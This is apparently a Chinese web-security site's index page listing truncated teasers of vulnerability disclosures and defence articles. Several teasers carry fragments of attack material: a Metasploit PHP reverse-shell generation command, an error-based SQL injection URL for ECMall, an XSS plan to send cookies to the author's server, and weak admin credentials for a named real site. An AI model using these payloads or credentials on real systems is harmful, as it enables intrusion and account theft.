struts2漏洞原理及解决办法 - 网站安全 - 自学php关注热度:18

1、原理Struts2的核心是使用的webwork框架，处理 action时通过调用底层的getter/setter方法来处理http的参数，它将每个http参数声明为一个ONGL（这里是ONGL的介绍）语句。当我们提交一个http参数..[详情]

php注入写文件 - 网站安全 - 自学php关注热度:17

教程实例一枚,直接切入.http://www.＊＊＊.gov.cn/gzdt_read.php?id=85加引号出现如下字样：Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\＊＊＊\.....[详情]

苏宁团购商品价格可修改问题及修复 - 网站安全关注热度:20

苏宁的厂商很靠谱，而且越来越重视安全了1.网站是：htttp://tuan.suning.com，其实是一个支付的bug，在团购买东西的时候，数量、金额都保存在客户端，并没有在服务端进行验证，因此可以..[详情]

铁血各种缺陷结合利用及修复 - 网站安全 - 自学关注热度:21

http://app.junph.com/Client/MyAddress.aspx存储Xss:街道地方CSRF:form action=http://app.junph.com/CallBack/UserCenterCallBack.ashx method=postinput type=test name=type value=edit/.....[详情]

Python扫描Webshell工具 - 网站安全 - 自学php关注热度:29

扫描目录下的可疑Webshell的文件，并显示出相应的代码。1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556#!/usr/bin/env pythonimport sysimport .....[详情]

Python利用inotify监视目录防Webshell - 网站安全 - 自关注热度:29

利用Linux的inotify文件变化通知机制,安装pyinotify扩展后编写出来的监视Webshell的小工具。当发现目录中新建或更改后的文件中包含有隐藏的PHP函数，可被Webshell利用的代码，则马上发送Em..[详情]

VICIDIAL Call Center Suite <=2.2.1-237多个缺陷及修复关注热度:25

...:::::VICIDIAL call center suite Blind SQL Injection Vulnerability::::.... #作者r: Sepahan TelCom IT Group (septelcom)官网: http://www.vicidial.org下砸: https://sourceforge.net/.....[详情]

Webify Blog任意文件删除缺陷及修复 - 网站安全 -关注热度:25

程序 : Webify Blog下载地址 : http://www.webify.ws/blog漏洞类型: Delete Arbitrary File Vulnerability作者 : JIKO(JAWAD) www.2cto.com jalikom@hotmail.com网站: No-ExploiT.CoM (Is Back).....[详情]

苏宁某站点后台弱口令及上传漏洞(含修复) - 网站关注热度:39

1.站点是：http://campus.suning.com/snjyw/2.后台地址http://campus.suning.com/snjyw/login.jsp3.直接admin/admin登录网站后台 www.2cto.com4.查看账号管理发现存在20多为管理员，全是弱口令1.后台的上传文件....[详情]

铁血社区存储Xss想弹谁就弹谁 - 网站安全 - 自学关注热度:29

铁血社区有个发邮件功能,只要知道对方马甲就能发送,不需要是否好友。在发送过程中,标题没有过滤导致了存储Xss呵呵。修复方案：转义:为防止用户提交恶意代码 将用户提交 内容 用..[详情]

逗游网反射型和持久型跨站 - 网站安全 - 自学关注热度:20

逗游网反射型跨站，未对url中的参数做必要的过滤，就带入函数组成网页，若参数中带入恶意跨站代码，则浏览器会执行代码造成跨站，逗游网有两处跨站，均可用来进行钓鱼，挂马攻..[详情]

中关村某分站短信验证码无限发送漏洞及修复关注热度:88

就是一个短信验证页面没限制发送条数，导致可以进行短信恶意轰炸的漏洞详细说明：以前中关村的二手都是在论坛交易买卖的，现在中关村新建了一个分站专门进行二手交易，网址是..[详情]

VICIDIAL Call Center Suite <=2.2.1-237多个缺陷及修复关注热度:39

...:::::VICIDIAL call center suite Blind SQL Injection Vulnerability::::.... #作者: Sepahan TelCom IT Group (septelcom)官网: http://www.vicidial.org下载地址: https://sourceforge.net.....[详情]

PHP源码中unserialize函数引发的漏洞分析 - 网站安关注热度:24

0x01 unserialize函数的概念首先看下官方给出的解释：unserialize() 对单一的已序列化的变量进行操作，将其转换回 PHP 的值。返回的是转换之后的值，可为 integer、float、string、array 或 object。..[详情]

UTF-7 XSS 浅析 - 网站安全 - 自学php关注热度:45

Test on: IE 8.0vul.php?phpheader(#39;Content-Type: text/html#39;);$string = $_GET[note];echo htmlentities($string); //用htmlentities函数过滤?sec.php?phpheader(#39;Content-Type: te.....[详情]

微信任意用户密码修改漏洞(已修复) - 网站安全关注热度:29

今天发现个微信群发的漏洞.还没玩.就被修补了.于是就有了这个漏洞的产生.同样问题产生在重置用户密码的环节.在微信官方的首页上发现新增了如下功能模块在这个页面输入一个已经注..[详情]

WEB程序的安全防御机制(二） - 网站安全 - 自学关注热度:22

2、处理用户的输入我们要这样认为，所有的用户输入都不可信。如何安全地处理用户输入是防御攻击的一个很关键的要求。一般的WEB程序都会在前台页面做输入确认（一般是js验证），..[详情]

WEB程序的安全防御机制(一） - 网站安全 - 自学关注热度:28

互联网上的WEB程序需要大量的安全机制来防御攻击。安全机制主要有：①处理用户的访问WEB的功能和数据，防止未授权访问。②处理用户的输入，防止用户的错误输入对程序造成影响。..[详情]

反射型xss明打十九楼各种超级版主 - 网站安全关注热度:34

1.首先找到十九楼一个反射型xss：http://www.19lou.com/search/user?ageType=4searchType=usergender=scriptalert(1)/scriptkeyword=111122222221配合获取cookie的一个js，将cookie发送到我的服务器上2.然.....[详情]

jsp和php的webshell反弹shell方法 - 网站安全 - 自学关注热度:115

1 .生成WEBSHELL文件msf msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R XX.php我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行把dis9.php传进你的SHELL里 例如 www.XXX.com/XX.ph.....[详情]

WordPress站点安全解决方案–你的WordPress站点安全关注热度:30

随着WordPress由博客系统转型为CMS系统，再加上无限的资源和个性化主题、插件可供用户选择，国内越来越多的用户开始使用WordPress搭建自己的博客、CMS站点，甚至于企业站点。但是搭建..[详情]

Sitecom Home Storage Center认证绕过 - 网站安全 - 自学关注热度:29

Security Advisory AA-006: Authorization Bypass Vulnerability in Password Reset Function Sitecom Home Storage Center (0-day)缺陷类型：Authorization Bypass危害：System AccessEase of.....[详情]

ECMall 2.x 两枚注射及修复 - 网站安全 - 自学php关注热度:35

Fuck one : \app\my_goods.app.php (2290行)Fuck one EXP 注册个会员-登录-提交以下即可http://site/index.php?app=my_goodsact=brand_editid=1 and(select 1 from(select count(*),concat((select.....[详情]

HTML5安全风险详析之二：Web Storage攻击 - 网站安全关注热度:30

上文：http://www.2cto.com/Article/201209/154081.html一、WebStorage简介 HTML5支持WebStorage，开发者可以为应用创建本地存储，存储一些有用的信息。例如LocalStorage可以长期存储，而且存放空间很大，..[详情]

HTML5安全风险详析之一：CORS攻击 - 网站安全 - 自关注热度:27

一、从SOP到CORS SOP就是Same Origin Policy同源策略，指一个域的文档或脚本，不能获取或修改另一个域的文档的属性。也就是Ajax不能跨域访问，我们之前的Web资源访问的根本策略都是建立在..[详情]

HTML5安全：CORS（跨域资源共享）简介 - 网站安全关注热度:26

前言：像CORS对于现代前端这么重要的技术在国内基本上居然很少有人使用和提及，在百度或者Google上搜索CORS，搜到的中文文章基本都是另外一种卫星定位技术CORS的介绍，让我等前端同..[详情]

mysql order by类型注射利用笔记 - 网站安全 - 自学关注热度:18

order by的注射也发生在表名的注射等的好处是一般不需要考虑magic_quotes_gpc等因素的影响,网上搜了下有一些盲注的利用方法,自己也测试了一下,发现可以直接利用mysql报错来注射,干净利落..[详情]

腾讯邮箱储存型xss复现利用及修复 - 网站安全关注热度:18

1.前面的构造流程是一样的 ，先是构造jpg2.将构造好的jpg发送到任意好友的qq邮箱3.获得对方能看到的图片地址发送成功后点击查看此邮件得到图片地址测试得到的地址在发送方qq邮箱登陆..[详情]

cmseasy文件上传+IIS6解释漏洞 - 网站安全 - 自学关注热度:30

漏洞文件：celive\live\doajaxfileupload.phpform enctype=multipart/form-data method=post action=http://www.cmseasy.cn/celive/live/doajaxfileupload.phpinput type=file name=fileToUplo.....[详情]

Cannonbolt Portfolio Manager v1.0存储型XSS及注射 - 网站关注热度:22

Cannonbolt Portfolio Manager v1.0 Stored XSS and SQL Injection Vulnerabilities作者: IWCn Systems Inc.官方网站: http://www.iwcn.ws影响版本: 1.0摘要:Cannonbolt Portfolio Manager is .....[详情]